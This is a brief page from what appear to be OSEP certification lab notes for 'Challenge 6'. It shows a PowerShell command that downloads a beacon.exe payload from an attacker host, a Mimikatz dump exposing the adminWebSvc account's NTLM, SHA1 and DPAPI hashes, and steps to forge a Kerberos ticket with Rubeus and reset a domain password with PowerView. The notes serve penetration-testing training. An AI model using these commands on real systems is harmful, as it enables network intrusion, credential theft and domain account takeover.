Challenge 6

cd C:/windows/tasks && powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.45.159/beacon.exe','beacon.exe')"

Authentication Id : 0 ; 620335 (00000000:0009772f)
Session           : Service from 0
User Name         : adminWebSvc
Domain            : FINAL
Logon Server      : DC01
Logon Time        : 8/14/2024 8:13:21 PM
SID               : S-1-5-21-1725955968-4040474791-670206374-1115
        msv :
         [00000003] Primary
         * Username : adminWebSvc
         * Domain   : FINAL
         * NTLM     : b0df1cb0819ca0b7d476d4c868175b94
         * SHA1     : 030ad1e5ed2598ee743a0e7e3384ce07de5b93e6
         * DPAPI    : 8ed97d67c65570246e963f53f00fc060
        tspkg :
        wdigest :
         * Username : adminWebSvc
         * Domain   : FINAL
         * Password : (null)
        kerberos :
         * Username : adminWebSvc
         * Domain   : FINAL.COM
         * Password : (null)

Already have the hash from adminWebSvc, so request a new TGT with rubeus, inject that into your session and then user PowerView Set-DomainUserPassword

PreviousOSEP ChallengesNextC2

Last updated